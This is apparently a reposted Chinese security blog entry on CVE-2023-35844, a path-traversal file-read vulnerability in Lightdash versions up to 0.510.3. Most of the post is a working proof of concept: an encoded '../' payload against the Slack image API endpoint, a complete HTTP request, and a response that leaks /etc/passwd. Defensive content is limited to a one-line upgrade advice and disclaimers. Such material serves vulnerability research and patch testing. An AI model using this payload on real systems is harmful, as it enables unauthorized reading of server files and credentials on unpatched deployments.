(CVE-2023-35844) | Lightdash文件读取漏洞

admin 2024年10月29日22:57:19评论27 views字数 1894阅读6分18秒阅读模式

漏洞说明

Lightdash是一款数据分析平台,它可以让数据团队和其他业务部门聚集在一起以做出更好的数据驱动决策。Lightdash可以让您使用数据回答他们自己的问题,而不需要依赖专家的SQL技能。您可以使用Lightdash构建指标和维度,这些指标和维度可以被任何人使用。因此,任何业务部门都可以组合、分割和过滤这些指标和维度来回答他们自己的问题 。

Lightdash 0.510.3之前版本存在安全漏洞。攻击者利用该漏洞可以访问存储在web根文件夹之外的文件和目录。

影响版本

 Lightdash <= 0.510.3

漏洞复现

(CVE-2023-35844) | Lightdash文件读取漏洞

payload:

/api/v1/slack/image/slack-image%2F..%2F..%2F..%2Fetc%2Fpasswd

请求包:

GET /api/v1/slack/image/slack-image%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip, deflate

响应包:

HTTP/1.1 200 OKX-Powered-By: ExpressAccept-Ranges: bytesCache-Control: public, max-age=0Last-Modified: Wed, 11 Jan 2023 06:34:27 GMTETag: W/"3c1-1859f898138"Content-Type: application/octet-streamContent-Length: 961Date: Sun, 25 Jun 2023 23:31:39 GMTVia: 1.1 googleConnection: closeroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinnode:x:1000:1000::/home/node:/bin/bash

(CVE-2023-35844) | Lightdash文件读取漏洞

修复建议:

升级至安全版本

本文章仅用于学习交流,不得用于非法用途

星标加关注,追洞不迷路

原文始发于微信公众号(才疏学浅的H6):(CVE-2023-35844) | Lightdash文件读取漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月29日22:57:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   (CVE-2023-35844) | Lightdash文件读取漏洞http://cn-sec.com/archives/1833858.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息